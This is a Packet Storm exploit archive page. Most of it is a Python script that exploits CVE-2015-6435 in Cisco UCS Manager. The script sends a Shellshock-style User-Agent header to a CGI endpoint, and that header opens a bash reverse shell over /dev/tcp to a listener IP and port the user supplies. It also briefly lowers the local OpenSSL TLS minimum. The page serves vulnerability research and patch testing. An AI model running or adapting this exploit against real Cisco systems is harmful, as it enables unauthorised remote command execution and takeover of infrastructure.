exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco UCS Manager 2.2(1d) Remote Command Execution

Cisco UCS Manager 2.2(1d) Remote Command Execution
Posted Jan 18, 2021
Authored by liquidsky

Cisco UCS Manager version 2.2(1d) remote command execution exploit. An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888.

tags | exploit, remote, web, arbitrary, shell, cgi
systems | cisco
advisories | CVE-2015-6435
SHA-256 | f3fab9befb8e7cbad15afa31a69504a465f274122e534cebcbde38a7d8f6288e

Cisco UCS Manager 2.2(1d) Remote Command Execution

Change Mirror Download
import sys, ssl, os, time
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

#
# Exploit Title : Cisco UCS Manager - 2.2(1d) - Remote Command Execution
# Description : An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888.
# Date : 1/15/2021
# Exploit Author : liquidsky (J.McPeters)
# Vulnerable Software : Cisco UCS Manager - 2.2(1d) -> [According to the vendor (cisco), this is known to impact versions prior to 3.0(2e).]
# Vendor Homepage : https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-manager/index.html
# Version : 2.2(1d), 2.2(3c)A
# Cisco Reference : https://quickview.cloudapps.cisco.com/quickview/bug/CSCur90888
# Tested On : Cisco UCS Manager - 2.2(1d) (Exploit ran with Debian 5.6.7-1kali1 (Kali 2020.1 x64))
# Author Site : https://github.com/fuzzlove/Cisco-UCS-Manager-2.2-1d-Remote-Command-Execution
# Demo : https://youtu.be/bZAcJrwPEb0
# CVE : CVE-2015-6435 | https://nvd.nist.gov/vuln/detail/CVE-2015-6435
# Special Notes : This application by default uses outdated TLS 1.0 for communication, so thats why there is a quickfix/temporary patch to 1.0 in openssl utilizing 'sed' (that gets changes back after exploitation).
#
# Greetz: wetw0rk, Fr13ndz, O.G.Xx25, MS, SS, JK, the S3 family, and last but NOT least droppunx ^_~
#

print "+-------------------------------------------------------------+"
print
print "- Cisco Unified Computing System Manager CGI RCE "
print
print " Cisco UCS Manager - 2.2(1d) - CVE-2015-6435"
print
print "- PoC by: LiquidSky - 1/15/21 | CISCO-BUG-ID: CSCur90888 "
print
print "+-------------------------------------------------------------+"

try:

target = sys.argv[1]
shellip = sys.argv[2]
shellport = sys.argv[3]

except IndexError:

print
print "- Usage: %s <vuln-site> <listener-ip> <listener-port>" % sys.argv[0]
print "- Example: %s https://ciscoucsmgr 192.168.1.123 443" % sys.argv[0]
print
sys.exit()

def ch3x_w00t():
if os.geteuid()==0:
print "[*] Running exploit as root."
else:
print "[!] You are not root, be sure you can change /etc/ssl/openssl.cnf"
print "[x] Most likely going to see an error..."
time.sleep(5)

# Performs backup of openssl.cnf just in case and performs checks of existing vulnerable pages...
def cisco_vuln():
ch3x_w00t()
print "[x] Backing up /etc/ssl/openssl.cnf to /etc/ssl/openssl.bak (just in case)"
os.system("cp /etc/ssl/openssl.cnf /etc/ssl/openssl.bak")
os.system("sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf")
print "[*] Checking vulnerable URL "
headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
#Checking page
check = requests.get(cisco_url, headers=headers1, verify=False)
#Grabbing response
res = check.text
if "true" in res:
return True
return False

# Safety check - make sure the user is okay with the TLS1.0 temp fix
# Shout out to Dean ^^ for keeping me polite...

def exploit_question():
print "[x] Warning the service by default uses TLS1.0 so . . ."
print
print "[?] This exploit temporarily patches '/etc/ssl/openssl.cnf' to use TLS1.0 using 'sed' and then changes back to TLS1.2"
print
print "[!] A backup is placed in /etc/ssl/openssl.bak just to be safe..."
print
question = raw_input('[!] Do you wish to continue, "yes" or "no" ?')
if question == 'yes':
print
print "[!] Great attempting exploitation checks: " + target + '!'
cisco_vuln()
else:
print
print "[x] Stay safe m8 ;) - Read the source, its safe . . "
print
sys.exit()

exploit_question()

def cisco_response():
headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
request = requests.get(cisco_url, headers=headers1, verify=False)
if request.status_code == 200:
print "[x] Page seems to exist -- Possibly vulnerable?"
else:
print "[!] Page does not exist - Not vulnerable"
print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")
sys.exit()

def cisco_exploit():
cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
headers = {"User-Agent": "() { ignored;};/bin/bash -i >& /dev/tcp/" + shellip + "/" + shellport + " 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

print "[x] Sending Shell to IP: " + shellip + " Port: " + shellport + ""
print "[?] If this works you will see the exploit hang"

requests.get(cisco_url, headers=headers, verify=False)
print "[!] Shell Sent"

cisco_exploit()

def main():
if cisco_vuln():
print ""
print "[+] Perhaps success?"
print ""
print " ^_~ got shellz? - [ liquidsky | 2021 ]"
print
print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")
else:
print "[-] failure!"
print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")

if __name__ == "__main__":
main()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close